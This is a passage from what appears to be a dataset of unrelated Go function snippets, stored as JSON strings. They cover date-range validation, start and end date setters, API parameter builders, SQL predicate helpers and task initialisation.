*pStartDate == \"\" && *pEndDate != \"\" {\n\t\t\tendDate, err := time.Parse(\"2006-01-02\", *pEndDate)\n\t\t\tif err == nil {\n\t\t\t\tif time.Now().Unix() <= endDate.Unix() {\n\t\t\t\t\t*pStartDate = time.Now().Format(\"2006-01-02\")\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tvar startDate, endDate time.Time\n\tvar err error\n\tif *pStartDate != \"\" {\n\t\tstartDate, err = time.Parse(\"2006-01-02\", *pStartDate)\n\t\tif err != nil {\n\t\t\tmessage = \"The start date is incorrect, format should be YYYY-MM-DD.\"\n\t\t\tlog.Error(message)\n\t\t\treturn false, message\n\t\t}\n\t}\n\tif *pEndDate != \"\" {\n\t\tendDate, err = time.Parse(\"2006-01-02\", *pEndDate)\n\t\tif err != nil {\n\t\t\tmessage = \"The end date is incorrect, format should be YYYY-MM-DD.\"\n\t\t\tlog.Error(message)\n\t\t\treturn false, message\n\t\t}\n\t}\n\n\tif *pStartDate != \"\" && *pEndDate != \"\" {\n\t\tif startDate.Unix() > endDate.Unix() {\n\t\t\tmessage = \"The start date is greater than the end date.\"\n\t\t\tlog.Error(message)\n\t\t\treturn false, message\n\t\t}\n\t}\n\treturn true, \"\"\n}", "func (d *InMemoryTaskDB) GetTasksFromDateRange(_ context.Context, start, end time.Time, repo string) ([]*types.Task, error) {\n\td.tasksMtx.RLock()\n\tdefer d.tasksMtx.RUnlock()\n\n\trv := []*types.Task{}\n\t// TODO(borenet): Binary search.\n\tfor _, b := range d.tasks {\n\t\tif (b.Created.Equal(start) || b.Created.After(start)) && b.Created.Before(end) {\n\t\t\tif repo == \"\" || b.Repo == repo {\n\t\t\t\trv = append(rv, b.Copy())\n\t\t\t}\n\t\t}\n\t}\n\tsort.Sort(types.TaskSlice(rv))\n\treturn rv, nil\n}", "func (b *GroupsEditBuilder) EventStartDate(v int) *GroupsEditBuilder {\n\tb.Params[\"event_start_date\"] = v\n\treturn b\n}", "func (_Crowdsale *CrowdsaleCaller) StartDate(opts *bind.CallOpts) (*big.Int, error) {\n\tvar (\n\t\tret0 = new(*big.Int)\n\t)\n\tout := ret0\n\terr := _Crowdsale.contract.Call(opts, out, \"startDate\")\n\treturn *ret0, err\n}", "func (original Calendar) Filter(filter CalendarFilter) (filtered Calendar, err error) {\n\tfor _, event := range original.Events {\n\t\tinclude := true\n\n\t\tif !filter.RangeLower.IsZero() {\n\t\t\tif event.End.Before(filter.RangeLower) {\n\t\t\t\tinclude = false\n\t\t\t}\n\t\t}\n\n\t\tif !filter.RangeUpper.IsZero() {\n\t\t\tif event.Start.After(filter.RangeUpper) {\n\t\t\t\tinclude = false\n\t\t\t}\n\t\t}\n\n\t\tif include {\n\t\t\tfiltered.Events = append(filtered.Events, event)\n\t\t}\n\t}\n\n\treturn\n}", "func GetByDateRange(rw http.ResponseWriter, r *http.Request) {\n\tuserID := r.Header.Get(\"userid\")\n\tstartDate := r.URL.Query().Get(\"startDate\")\n\tendDate := r.URL.Query().Get(\"endDate\")\n\n\t// Validate startDate and endDate\n\tif startDate == \"\" || endDate == \"\" {\n\t\tlog.Printf(\"Invalid params, startDate or endDate is missing\\n\")\n\t\trw.WriteHeader(http.StatusBadRequest)\n\t\trw.Write([]byte(\"Missing startDate or endDate\"))\n\t\treturn\n\t}\n\n\tif _, err := time.Parse(time.RFC3339, startDate); err != nil {\n\t\tlog.Printf(\"Invalid value for startDate\\n\")\n\t\trw.WriteHeader(http.StatusBadRequest)\n\t\trw.Write([]byte(\"Invalid startDate\"))\n\t\treturn\n\t}\n\n\tif _, err := time.Parse(time.RFC3339, endDate); err != nil {\n\t\tlog.Printf(\"Invalid value for endDate\\n\")\n\t\trw.WriteHeader(http.StatusBadRequest)\n\t\trw.Write([]byte(\"Invalid endDate\"))\n\t\treturn\n\t}\n\n\tquery := `SELECT * FROM events\n\t\tWHERE owner_id = $1 AND\n\t\t(start_time BETWEEN $2 AND $3 OR\n\t\tend_time BETWEEN $2 AND $3)`\n\n\trows, err := conn.DB.Query(query, userID, startDate, endDate)\n\tif err != nil {\n\t\tlog.Printf(\"DB error: %s\\n\", err)\n\t\trw.WriteHeader(http.StatusBadRequest)\n\t\trw.Write([]byte(\"Unable to communicate with database\"))\n\t\treturn\n\t}\n\tdefer rows.Close()\n\n\tevents := []Event{}\n\tfor rows.Next() {\n\t\te := Event{}\n\t\tloc := sql.NullString{}\n\t\tnotes := sql.NullString{}\n\n\t\terr = rows.Scan(&e.EventID, &e.Title, &e.StartTime, &e.EndTime, &loc, &notes, &e.OwnerID)\n\t\tif err != nil {\n\t\t\tlog.Printf(\"DB error: %s\\n\", err)\n\t\t\trw.WriteHeader(http.StatusBadRequest)\n\t\t\trw.Write([]byte(\"Error reading from database\"))\n\t\t\treturn\n\t\t}\n\n\t\te.Location = loc.String\n\t\te.Notes = notes.String\n\n\t\tevents = append(events, e)\n\t}\n\n\trw.WriteHeader(http.StatusOK)\n\trw.Header().Set(\"Content-Type\", \"application/json\")\n\tjson.NewEncoder(rw).Encode(events)\n}", "func (o *GetBeneficiariesParams) validateStartDate(formats strfmt.Registry) error {\n\n\tif err := validate.FormatOf(\"startDate\", \"query\", \"date\", o.StartDate.String(), formats); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func filterForTimeSlice(t *common.TimeSlice, startName, endName string) *filters.Filter {\n\tif t == nil {\n\t\tu := common.UnixMillis(time.Now())\n\t\tt = common.NewTimeSlice(u, u)\n\t}\n\n\treturn filters.NewAndFilter(\n\t\tfilters.NewLteInt64Filter(startName, t.Last),\n\t\tfilters.NewOrFilter(\n\t\t\tfilters.NewNullFilter(endName),\n\t\t\tfilters.NewGteInt64Filter(endName, t.Start),\n\t\t),\n\t)\n}", "func (op *PaymentsListOp) FromDate(val time.Time) *PaymentsListOp {\n\tif op != nil {\n\t\top.QueryOpts.Set(\"from_date\", val.Format(time.RFC3339))\n\t}\n\treturn op\n}", "func (c *StatsGetSearchapplicationCall) StartDateDay(startDateDay int64) *StatsGetSearchapplicationCall {\n\tc.urlParams_.Set(\"startDate.day\", fmt.Sprint(startDateDay))\n\treturn c\n}", "func setNonPrimitiveParams(params *CmdLineParams) {\n\n\tif params.StartDateStr != \"\" {\n\t\tparams.StartDate = parseDate(params.StartDateStr)\n\t}\n\n\tif params.EndDateStr != \"\" {\n\t\tparams.EndDate = parseDate(params.EndDateStr)\n\t} else {\n\t\tparams.EndDate = time.Now()\n\t}\n\n\tif params.FilterFpr != \"\" {\n\t\tfprs := strings.Split(params.FilterFpr, \",\")\n\t\tfor _, fpr := range fprs {\n\t\t\tparams.Filter.AddFingerprint(tor.Fingerprint(fpr))\n\t\t}\n\t}\n\n\tif params.FilterAddr != \"\" {\n\t\taddrs := strings.Split(params.FilterAddr, \",\")\n\t\tfor _, addr := range addrs {\n\t\t\tparams.Filter.AddIPAddr(net.ParseIP(addr))\n\t\t}\n\t}\n\n\tif params.FilterNickname != \"\" {\n\t\tnicks := strings.Split(params.FilterNickname, \",\")\n\t\tfor _, nick := range nicks {\n\t\t\tparams.Filter.AddNickname(nick)\n\t\t}\n\t}\n\n\tlog.Printf(\"Object filter is empty: %t\", params.Filter.IsEmpty())\n}", "func (o *GetPostListParams) bindDateFrom(rawData []string, hasKey bool, formats strfmt.Registry) error {\n\tvar raw string\n\tif len(rawData) > 0 {\n\t\traw = rawData[len(rawData)-1]\n\t}\n\n\t// Required: false\n\t// AllowEmptyValue: false\n\n\tif raw == \"\" { // empty values pass all other validations\n\t\treturn nil\n\t}\n\to.DateFrom = &raw\n\n\treturn nil\n}", "func constructListPagesRequest(entity ProjectEntity, status string, filterLocal bool) *ecs.ListTasksInput {\n\trequest := &ecs.ListTasksInput{\n\t\tDesiredStatus: aws.String(status),\n\t}\n\n\t// if service set ServiceName to the request, else set StartedBy to filter out (provided filterLocal is true)\n\tif entity.EntityType() == \"service\" {\n\t\trequest.ServiceName = aws.String(GetServiceName(entity))\n\t} else if filterLocal {\n\t\trequest.StartedBy = aws.String(GetStartedBy(entity))\n\t}\n\treturn request\n}", "func (o *GetUserUsageParams) WithFilterenddate(filterenddate *int64) *GetUserUsageParams {\n\to.SetFilterenddate(filterenddate)\n\treturn o\n}", "func (t *Task) Init(workDir string, allowOverride bool, runs *[]run.Run, dryRun bool) error {\n // Create a queue of runs for this particular task\n t.runs = NewQueue(len(*runs))\n\n // Set the working directory\n t.resultsDir = path.Join(workDir, \"results\", t.UUID())\n t.cacheDir = path.Join(workDir, \".cache\")\n\n // Set additional task configuration\n t.AllowOverride = allowOverride\n\n // Create a results directory for this task\n if _, err := os.Stat(t.resultsDir); os.IsNotExist(err) {\n if !dryRun {\n os.MkdirAll(t.resultsDir, os.ModePerm)\n }\n\n // Check if we're allowed to override a non-empty directory\n } else {\n isEmpty, err := IsDirEmpty(t.resultsDir)\n if err != nil {\n return err\n }\n if !isEmpty && !allowOverride {\n return fmt.Errorf(\"Task directory not empty: %s\", t.resultsDir)\n }\n\n if !dryRun {\n os.MkdirAll(workDir, os.ModePerm)\n }\n }\n\n // Add the runs in-order\n for _, run := range *runs {\n t.runs.Enqueue(run)\n }\n\n return nil\n}", "func (cd *CreationDateField) InitializeCreationDate() {\n\tcd.CreationDate = common.Now()\n}", "func StartDateEQ(v time.Time) predicate.FlowInstance {\n\treturn predicate.FlowInstance(func(s *sql.Selector) {\n\t\ts.Where(sql.EQ(s.C(FieldStartDate), v))\n\t})\n}", "func preparestarttaskparams(params map[string]string, starttask Starttask, Region string) {\n\tif Region != \"\" {\n\t\tparams[\"Region\"] = Region\n\t}\n\tparams[\"amztarget\"] = \"AmazonEC2ContainerServiceV20141113.StartTask\"\n}", "func runList(props ListCmdProps, output io.Writer, repo db.Repo) error {\n\tstart, err := parseDateOrDefault(props.startDate)\n\n\tif props.startDate == \"\" {\n\t\tdefaultStart := start.Add(-1 * time.Hour * 24 * 30)\n\t\tstart = &defaultStart\n\t}\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tend, err := parseDateOrDefault(props.endDate)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tworkingDays, err := repo.ListRange(start, end)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\n\trenderTable(workingDays, output)\n\n\treturn nil\n}", "func (o *AdminGetBannedDevicesV4Params) SetStartDate(startDate *string) {\n\to.StartDate = startDate\n}", "func (o *GetMetricsParams) SetStartDate(startDate *strfmt.DateTime) {\n\to.StartDate = startDate\n}", "func EndDateIn(vs ...time.Time) predicate.FlowInstance {\n\tv := make([]interface{}, len(vs))\n\tfor i := range v {\n\t\tv[i] = vs[i]\n\t}\n\treturn predicate.FlowInstance(func(s *sql.Selector) {\n\t\t// if not arguments were provided, append the FALSE constants,\n\t\t// since we can't apply \"IN ()\". This will make this predicate falsy.\n\t\tif len(v) == 0 {\n\t\t\ts.Where(sql.False())\n\t\t\treturn\n\t\t}\n\t\ts.Where(sql.In(s.C(FieldEndDate), v...))\n\t})\n}", "func Init(d int) {\n\tcountByDay = loadCountFile()\n\tlog.Info(fmt.Sprintf(\"Processing files until %d days ago\", d))\n\tprocessCDRfiles(d)\n\tlog.Info(\"Creating result file\")\n\ttoCountToFile()\n\n\tcreateResultFile()\n\tif len(filesProcessed) > 0 {\n\t\t//Backup Process\n\t\tif config.Conf.Process.Backup {\n\t\t\tcompressAllFiles()\n\t\t\tcopyFilesToBackup()\n\t\t\tremoveFiles()\n\t\t}\n\n\t\tnotifyResult()\n\t} else {\n\t\tnotifyTeam(\"<b> No files loaded! <b>\")\n\t}\n}", "func (s *ResourceCountsSummary) SetUpToDate(v int64) *ResourceCountsSummary {\n\ts.UpToDate = &v\n\treturn s\n}", "func RangeDate(start, end time.Time) func() time.Time {\n\ty, m, d := start.Date()\n\tstart = time.Date(y, m, d, 0, 0, 0, 0, start.Location())\n\ty, m, d = end.Date()\n\tend = time.Date(y, m, d, 0, 0, 0, 0, end.Location())\n\n\treturn func() time.Time {\n\t\tif start.After(end) {\n\t\t\treturn time.Time{}\n\t\t}\n\t\tdate := start\n\t\tstart = start.AddDate(0, 0, 1)\n\t\treturn date\n\t}\n}", "func (o *InlineResponse20051TodoItems) HasStartDate() bool {\n\tif o != nil && o.StartDate != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func init() {\n\tsort.Strings(days)\n\tsort.Strings(months)\n}", "func (o *AdminSearchUserV3Params) SetStartDate(startDate *string) {\n\to.StartDate = startDate\n}", "func ImportDateIn(vs ...time.Time) predicate.Watchlist {\n\tv := make([]interface{}, len(vs))\n\tfor i := range v {\n\t\tv[i] = vs[i]\n\t}\n\treturn predicate.Watchlist(func(s *sql.Selector) {\n\t\t// if not arguments were provided, append the FALSE constants,\n\t\t// since we can't apply \"IN ()\". This will make this predicate falsy.\n\t\tif len(v) == 0 {\n\t\t\ts.Where(sql.False())\n\t\t\treturn\n\t\t}\n\t\ts.Where(sql.In(s.C(FieldImportDate), v...))\n\t})\n}", "func (o *GetExpensesParams) bindDateFrom(rawData []string, hasKey bool, formats strfmt.Registry) error {\n\tvar raw string\n\tif len(rawData) > 0 {\n\t\traw = rawData[len(rawData)-1]\n\t}\n\n\t// Required: false\n\t// AllowEmptyValue: false\n\tif raw == \"\" { // empty values pass all other validations\n\t\treturn nil\n\t}\n\n\to.DateFrom = &raw\n\n\treturn nil\n}", "func (t Trip) Initialize() {\n\tt.CreatedDate = time.Now()\n\tt.UpdatedDate = time.Now()\n\tt.Public = false\n}", "func (o *GetUserUsageParams) SetFilterenddate(filterenddate *int64) {\n\to.Filterenddate = filterenddate\n}", "func (q LocationTemperatureQueryResult) InitialiseForDate(city string, y int, mo int, d int) {\n\tif _, initialised := q[city]; !initialised {\n\t\tq[city] = YearlyTemperatureQuery{}\n\t}\n\tif _, initialised := q[city][y]; !initialised {\n\t\tq[city][y] = MonthlyTemperatureQuery{}\n\t}\n\n\tif _, initialised := q[city][y][mo]; !initialised {\n\t\tq[city][y][mo] = DailyTemperatureQuery{}\n\t}\n\n\tif _, initialised := q[city][y][mo][d]; !initialised {\n\t\tq[city][y][mo][d] = TemperatureQueries{}\n\t}\n}", "func (d *Database) CacheDates(tx *sqlx.Tx) (err error) {\n\t_, err = tx.NamedExec(\"UPDATE database SET start_date = (SELECT COALESCE(min(start_date1),-2147483648) FROM site_range WHERE site_id IN (SELECT id FROM site where database_id = $1) AND start_date1 != -2147483648), end_date = (SELECT COALESCE(max(end_date2),2147483647) FROM site_range WHERE site_id IN (SELECT id FROM site where database_id = $1) AND end_date2 != 2147483647) WHERE id = $1\", d)\n\treturn\n}", "func (_Crowdsale *CrowdsaleTransactorSession) SetStartDate(_startDate *big.Int) (*types.Transaction, error) {\n\treturn _Crowdsale.Contract.SetStartDate(&_Crowdsale.TransactOpts, _startDate)\n}", "func (conf *ProjectConfig) Init() (err error) {\n\tfor _, taskName := range conf.SortedTaskNames {\n\t\ttask := conf.Tasks[taskName]\n\t\tif err = task.init(); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn err\n}", "func init() {\n\tdays := 0\n\tfor i := 0; i < len(NepaliDateMap); i++ {\n\t\tfor _, inv := range NepaliDateMap[firstNepaliDate.Year+i] {\n\t\t\tdays += inv\n\t\t}\n\t\tcumulativeDaysInNepaliYear[firstNepaliDate.Year+i] = days\n\t}\n}", "func (_Crowdsale *CrowdsaleSession) SetStartDate(_startDate *big.Int) (*types.Transaction, error) {\n\treturn _Crowdsale.Contract.SetStartDate(&_Crowdsale.TransactOpts, _startDate)\n}", "func (o *GetIPLoadbalancingServiceNameTaskParams) SetCreationDateFrom(creationDateFrom *strfmt.DateTime) {\n\to.CreationDateFrom = creationDateFrom\n}", "func ValidateDate(startDate, endDate string)(time.Time,time.Time,error){\n\tstart,err := validateDate(startDate) //\n\tif err!=nil{\n\t\treturn start,time.Time{},err\n\t}\n\n\tend,err := validateDate(endDate)\n\tif err!=nil{\n\t\treturn start,end,err\n\t}\n\treturn start,end,nil\n}", "func DateRange(args []string) bool {\n\tgetMonth := func(name string) time.Month {\n\t\tmonth, _ := month[name]\n\t\treturn month\n\t}\n\targc := len(args)\n\tif argc < 1 {\n\t\treturn false\n\t}\n\tfor k, v := range args {\n\t\targs[k] = strings.ToUpper(v)\n\t}\n\tnow := DefaultNower.Now()\n\tisGMT := args[argc-1] == \"GMT\"\n\tif isGMT {\n\t\targc--\n\t\tnow = now.UTC()\n\t}\n\tif argc == 1 {\n\t\ttmp, err := strconv.Atoi(args[0])\n\t\tif err != nil {\n\t\t\treturn now.Month() == getMonth(args[0])\n\t\t} else if tmp <= 31 {\n\t\t\treturn now.Day() == tmp\n\t\t} else {\n\t\t\treturn now.Year() == tmp\n\t\t}\n\t}\n\tdate1 := now\n\tfor i := 0; i < argc/2; i++ {\n\t\ttmp, err := strconv.Atoi(args[i])\n\t\tif err != nil {\n\t\t\tm := getMonth(args[i])\n\t\t\tif m == 0 {\n\t\t\t\treturn false\n\t\t\t}\n\t\t\tdate1 = time.Date(\n\t\t\t\tdate1.Year(),\n\t\t\t\tm,\n\t\t\t\tdate1.Day(),\n\t\t\t\tdate1.Hour(),\n\t\t\t\tdate1.Minute(),\n\t\t\t\tdate1.Second(),\n\t\t\t\tdate1.Nanosecond(),\n\t\t\t\tdate1.Location(),\n\t\t\t)\n\t\t} else if tmp <= 31 {\n\t\t\tdate1 = time.Date(\n\t\t\t\tdate1.Year(),\n\t\t\t\tdate1.Month(),\n\t\t\t\ttmp,\n\t\t\t\tdate1.Hour(),\n\t\t\t\tdate1.Minute(),\n\t\t\t\tdate1.Second(),\n\t\t\t\tdate1.Nanosecond(),\n\t\t\t\tdate1.Location(),\n\t\t\t)\n\t\t} else {\n\t\t\tdate1 = time.Date(\n\t\t\t\ttmp,\n\t\t\t\tdate1.Month(),\n\t\t\t\tdate1.Day(),\n\t\t\t\tdate1.Hour(),\n\t\t\t\tdate1.Minute(),\n\t\t\t\tdate1.Second(),\n\t\t\t\tdate1.Nanosecond(),\n\t\t\t\tdate1.Location(),\n\t\t\t)\n\t\t}\n\t}\n\tdate2 := now\n\tfor i := argc / 2; i < argc; i++ {\n\t\ttmp, err := strconv.Atoi(args[i])\n\t\tif err != nil {\n\t\t\tm := getMonth(args[i])\n\t\t\tif m == 0 {\n\t\t\t\treturn false\n\t\t\t}\n\t\t\tdate2 = time.Date(\n\t\t\t\tdate2.Year(),\n\t\t\t\tm,\n\t\t\t\tdate2.Day(),\n\t\t\t\tdate2.Hour(),\n\t\t\t\tdate2.Minute(),\n\t\t\t\tdate2.Second(),\n\t\t\t\tdate2.Nanosecond(),\n\t\t\t\tdate2.Location(),\n\t\t\t)\n\t\t} else if tmp <= 31 {\n\t\t\tdate2 = time.Date(\n\t\t\t\tdate2.Year(),\n\t\t\t\tdate2.Month(),\n\t\t\t\ttmp,\n\t\t\t\tdate2.Hour(),\n\t\t\t\tdate2.Minute(),\n\t\t\t\tdate2.Second(),\n\t\t\t\tdate2.Nanosecond(),\n\t\t\t\tdate2.Location(),\n\t\t\t)\n\t\t} else {\n\t\t\tdate2 = time.Date(\n\t\t\t\ttmp,\n\t\t\t\tdate2.Month(),\n\t\t\t\tdate2.Day(),\n\t\t\t\tdate2.Hour(),\n\t\t\t\tdate2.Minute(),\n\t\t\t\tdate2.Second(),\n\t\t\t\tdate2.Nanosecond(),\n\t\t\t\tdate2.Location(),\n\t\t\t)\n\t\t}\n\t}\n\tvar (\n\t\tnano = now.UnixNano()\n\t\tnano1 = date1.UnixNano()\n\t\tnano2 = date2.UnixNano()\n\t)\n\tif nano2 < nano1 {\n\t\tnano1, nano2 = nano2, nano1\n\t}\n\treturn nano1 <= nano && nano <= nano2\n}", "func StartDateNEQ(v time.Time) predicate.FlowInstance {\n\treturn predicate.FlowInstance(func(s *sql.Selector) {\n\t\ts.Where(sql.NEQ(s.C(FieldStartDate), v))\n\t})\n}", "func RangeDate(start, end time.Time) func() time.Time {\n\ty, m, d := start.Date()\n\tstart = time.Date(y, m, d, 0, 0, 0, 0, time.UTC)\n\ty, m, d = end.Date()\n\tend = time.Date(y, m, d, 0, 0, 0, 0, time.UTC)\n\n\treturn func() time.Time {\n\t\tif start.After(end) {\n\t\t\treturn time.Time{}\n\t\t}\n\t\tdate := start\n\t\tstart = start.AddDate(0, 0, 1)\n\t\treturn date\n\t}\n}", "func (g Generator) setOrderDates(o *ir.Order, r *pathway.Results, eventTime time.Time) error {\n\to.ReportedDateTime = ir.NewValidTime(eventTime)\n\t// If this is the first Result for this order, also set CollectedDateTime and ReceivedInLabDateTime.\n\tif len(o.Results) == 0 {\n\t\t// order time <= collected time <= received in lab time <= reported time\n\t\t// 1) To calculate collected time time:\n\t\t// - get the difference between order and report time\n\t\t// - select random delay from it.\n\t\torderToCollectedDelay := pathway.Delay{From: 0, To: eventTime.Sub(o.OrderDateTime.Time)}\n\t\to.CollectedDateTime = ir.NewValidTime(o.OrderDateTime.Add(orderToCollectedDelay.Random()))\n\n\t\t// 2) To calculate received in lab time:\n\t\t// - get the difference between collected and reported time\n\t\t// - select random delay from it.\n\t\tcollectedToReceivedInLabDelay := pathway.Delay{From: 0, To: eventTime.Sub(o.CollectedDateTime.Time)}\n\t\to.ReceivedInLabDateTime = ir.NewValidTime(o.CollectedDateTime.Time.Add(collectedToReceivedInLabDelay.Random()))\n\t}\n\n\t// Override dates if specified in the pathway.\n\tif r.CollectedDateTime != \"\" {\n\t\tcollected, err := overriddenDate(r.CollectedDateTime, o.CollectedDateTime)\n\t\tif err != nil {\n\t\t\treturn errors.Wrapf(err, \"cannot override CollectedDateTime with %v\", r.CollectedDateTime)\n\t\t}\n\t\to.CollectedDateTime = collected\n\t}\n\tif r.ReceivedInLabDateTime != \"\" {\n\t\treceived, err := overriddenDate(r.ReceivedInLabDateTime, o.ReceivedInLabDateTime)\n\t\tif err != nil {\n\t\t\treturn errors.Wrapf(err, \"cannot override ReceivedInLabDateTime with %v\", r.ReceivedInLabDateTime)\n\t\t}\n\t\to.ReceivedInLabDateTime = received\n\t}\n\n\treturn nil\n}", "func (s DateFilter) MarshalFields(e protocol.FieldEncoder) error {\n\tif s.DateRange != nil {\n\t\tv := s.DateRange\n\n\t\tmetadata := protocol.Metadata{}\n\t\te.SetFields(protocol.BodyTarget, \"DateRange\", v, metadata)\n\t}\n\tif s.End != nil {\n\t\tv := *s.End\n\n\t\tmetadata := protocol.Metadata{}\n\t\te.SetValue(protocol.BodyTarget, \"End\", protocol.QuotedValue{ValueMarshaler: protocol.StringValue(v)}, metadata)\n\t}\n\tif s.Start != nil {\n\t\tv := *s.Start\n\n\t\tmetadata := protocol.Metadata{}\n\t\te.SetValue(protocol.BodyTarget, \"Start\", protocol.QuotedValue{ValueMarshaler: protocol.StringValue(v)}, metadata)\n\t}\n\treturn nil\n}", "func (cm *CostModel) DateRange() (time.Time, time.Time, error) {\n\tctx := prom.NewNamedContext(cm.PrometheusClient, prom.AllocationContextName)\n\n\tresOldest, _, err := ctx.QuerySync(fmt.Sprintf(queryFmtOldestSample, env.GetPromClusterFilter(), \"90d\", \"1h\"))\n\tif err != nil {\n\t\treturn time.Time{}, time.Time{}, fmt.Errorf(\"querying oldest sample: %w\", err)\n\t}\n\tif len(resOldest) == 0 || len(resOldest[0].Values) == 0 {\n\t\treturn time.Time{}, time.Time{}, fmt.Errorf(\"querying oldest sample: no results\")\n\t}\n\toldest := time.Unix(int64(resOldest[0].Values[0].Value), 0)\n\n\tresNewest, _, err := ctx.QuerySync(fmt.Sprintf(queryFmtNewestSample, env.GetPromClusterFilter(), \"90d\", \"1h\"))\n\tif err != nil {\n\t\treturn time.Time{}, time.Time{}, fmt.Errorf(\"querying newest sample: %w\", err)\n\t}\n\tif len(resNewest) == 0 || len(resNewest[0].Values) == 0 {\n\t\treturn time.Time{}, time.Time{}, fmt.Errorf(\"querying newest sample: no results\")\n\t}\n\tnewest := time.Unix(int64(resNewest[0].Values[0].Value), 0)\n\n\treturn oldest, newest, nil\n}", "func init() {\n\tcdt.CustomDateFormat = \"2006-01-02\"\n\tcdt.CustomTimeFormat = \"15:04\"\n\tcdt.CustomDateTimeFormat = time.RFC3339\n}", "func (sp *ScheduleParams) SetDate(date ...time.Time) *ScheduleParams {\n\tif len(date) == 1 {\n\t\tsp.date = &date[0]\n\t} else {\n\t\tsp.startDate = &date[0]\n\t\tsp.endDate = &date[1]\n\t}\n\treturn sp\n}", "func (m *ReportsRequestBuilder) MicrosoftGraphNetworkaccessEntitiesSummariesWithStartDateTimeWithEndDateTime(endDateTime *i336074805fc853987abe6f7fe3ad97a6a6f3077a16391fec744f671a015fbd7e.Time, startDateTime *i336074805fc853987abe6f7fe3ad97a6a6f3077a16391fec744f671a015fbd7e.Time)(*ReportsMicrosoftGraphNetworkaccessEntitiesSummariesWithStartDateTimeWithEndDateTimeRequestBuilder) {\n return NewReportsMicrosoftGraphNetworkaccessEntitiesSummariesWithStartDateTimeWithEndDateTimeRequestBuilderInternal(m.BaseRequestBuilder.PathParameters, m.BaseRequestBuilder.RequestAdapter, endDateTime, startDateTime)\n}", "func (o *GetPaymentsParams) SetFilterSubmissionSubmissionDateFrom(filterSubmissionSubmissionDateFrom *strfmt.DateTime) {\n\to.FilterSubmissionSubmissionDateFrom = filterSubmissionSubmissionDateFrom\n}", "func preparestarttaskparamsdict(starttaskjsonmap map[string]interface{}, starttask Starttask) {\n\tif starttask.Cluster != \"\" {\n\t\tstarttaskjsonmap[\"cluster\"] = starttask.Cluster\n\t}\n\tif starttask.TaskDefinition != \"\" {\n\t\tstarttaskjsonmap[\"taskDefinition\"] = starttask.TaskDefinition\n\t}\n\tif len(starttask.ContainerInstances) != 0 {\n\t\tstarttaskjsonmap[\"containerInstances\"] = starttask.ContainerInstances\n\t}\n\n\tif starttask.Group != \"\" {\n\t\tstarttaskjsonmap[\"group\"] = starttask.Group\n\t}\n\tif starttask.StartedBy != \"\" {\n\t\tstarttaskjsonmap[\"startedBy\"] = starttask.StartedBy\n\t}\n\n\tpreparestarttaskoverridesparams(starttaskjsonmap, starttask)\n}", "func (o *InlineResponse20051TodoItems) SetStartDate(v string) {\n\to.StartDate = &v\n}", "func DepositDateIn(vs ...time.Time) predicate.Order {\n\tv := make([]interface{}, len(vs))\n\tfor i := range v {\n\t\tv[i] = vs[i]\n\t}\n\treturn predicate.Order(func(s *sql.Selector) {\n\t\t// if not arguments were provided, append the FALSE constants,\n\t\t// since we can't apply \"IN ()\". This will make this predicate falsy.\n\t\tif len(v) == 0 {\n\t\t\ts.Where(sql.False())\n\t\t\treturn\n\t\t}\n\t\ts.Where(sql.In(s.C(FieldDepositDate), v...))\n\t})\n}", "func (m *ItemSitesSiteItemRequestBuilder) GetActivitiesByIntervalWithStartDateTimeWithEndDateTimeWithInterval(endDateTime *string, interval *string, startDateTime *string)(*ItemSitesItemGetActivitiesByIntervalWithStartDateTimeWithEndDateTimeWithIntervalRequestBuilder) {\n return NewItemSitesItemGetActivitiesByIntervalWithStartDateTimeWithEndDateTimeWithIntervalRequestBuilderInternal(m.BaseRequestBuilder.PathParameters, m.BaseRequestBuilder.RequestAdapter, endDateTime, interval, startDateTime)\n}", "func init() {\n\tglobals.StartTime = time.Now()\n}", "func (o *ViewProjectMinMaxAvailableDates) HasMinStartDate() bool {\n\tif o != nil && o.MinStartDate != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (ms *MySQLStore) GetCompletedBetweenDates(userID int64, beginDate string, endDate string) ([]*tasks.Task, error) {\n\tquery := \"SELECT ID, Name, Description, IsComplete, IsHidden, CreatedAt, EditedAt FROM TodoList WHERE UserID = ? AND CreatedAt between ? and ? AND IsComplete\"\n\trows, err := ms.Client.Query(query, userID, beginDate, endDate)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer rows.Close()\n\n\t// Extract each task\n\ttodoList := []*tasks.Task{}\n\tfor rows.Next() {\n\t\tdescription := sql.NullString{}\n\t\ttask := &tasks.Task{}\n\t\tif err := rows.Scan(&task.ID, &task.Name, &description, &task.IsComplete,\n\t\t\t&task.IsHidden, &task.CreatedAt, &task.EditedAt); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\ttask.Description = description.String\n\t\ttodoList = append(todoList, task)\n\t}\n\n\t// Set all todoList to the same user\n\tuser, err := ms.UserStore.GetByID(userID)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, task := range todoList {\n\t\ttask.User = user\n\t}\n\n\treturn todoList, nil\n}", "func (biuo *BlockInstanceUpdateOne) SetStartDate(t time.Time) *BlockInstanceUpdateOne {\n\tbiuo.mutation.SetStartDate(t)\n\treturn biuo\n}", "func (r *Reporter) setupDays(dateFrom, dateTo time.Time) (time.Time, int, error) {\n\tif dateTo.Before(dateFrom) {\n\t\treturn time.Now(), 0, errors.New(r.Config.Translate.DateError1)\n\t}\n\tif dateTo.After(time.Now()) {\n\t\treturn time.Now(), 0, errors.New(r.Config.Translate.DateError2)\n\t}\n\tdateFromRounded := time.Date(dateFrom.Year(), dateFrom.Month(), dateFrom.Day(), 0, 0, 0, 0, time.UTC)\n\tdateToRounded := time.Date(dateTo.Year(), dateTo.Month(), dateTo.Day(), 0, 0, 0, 0, time.UTC)\n\tnumberOfDays := int(dateToRounded.Sub(dateFromRounded).Hours() / 24)\n\treturn dateFromRounded, numberOfDays, nil\n}", "func (o *RollbackDeductedLoyaltyPointsEffectProps) SetStartDate(v time.Time) {\n\to.StartDate = &v\n}", "func (o *PutOrdersOrderFidProductsOrderProductFidSetInitialTermParams) SetStartDate(startDate *string) {\n\to.StartDate = startDate\n}", "func (etc *ExportTaskCreate) SetFilters(s string) *ExportTaskCreate {\n\tetc.mutation.SetFilters(s)\n\treturn 